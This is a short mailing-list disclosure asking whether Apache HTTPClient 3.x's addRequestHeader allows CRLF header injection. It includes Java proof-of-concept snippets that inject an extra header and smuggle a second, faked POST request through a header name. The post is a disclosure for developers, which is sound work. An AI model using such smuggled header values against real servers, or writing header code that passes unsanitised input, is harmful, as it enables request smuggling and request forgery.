Potential HTTP Header Injection in Apache HTTPClient

[chevalier 3as <chevalier3as () gmail com>]

Hi,

As I'm not sure if this is a vulnerability or simply a 'feature', I'm
posting the details for more information.

The addRequestHeader method of the Apache HTTPClient module version
3.x seems to allow the injection of more than a header (potentilally
the latest version 4.x too for addHeader method):

Using the following code, it includes a third header in the request:
        HttpClient client = new HttpClient();
        PostMethod method = new PostMethod("http://www.google.fr";);
        method.addRequestHeader("header1", "value1\r\nheader3: value3");
        method.addRequestHeader("header2","value2");


The real risk is adding a second request using a similar code:
req.addRequestHeader("Content-Length:0\r\n\r\n" +
"POST\t/anotherpath\tHTTP/1.1\r\n" +
"Host:host\r\n" +
"Referer:faked\r\n" +
"User-Agent:faked\r\n" +
"Content-Type:faked\r\n" +
"Content-Length:3\r\n" +
"\r\n" +
"foo\n",
"bar");

Because of the Content-Length header, the sever will consider it as a
seperate request.

Iis this an expected behavior ? if so developpers should be aware of
the risk letting a user input values.

A similar advisory for Flash is available here:
http://www.rapid7.com/resources/advisories/R7-0026.jsp

My 2 cents,
As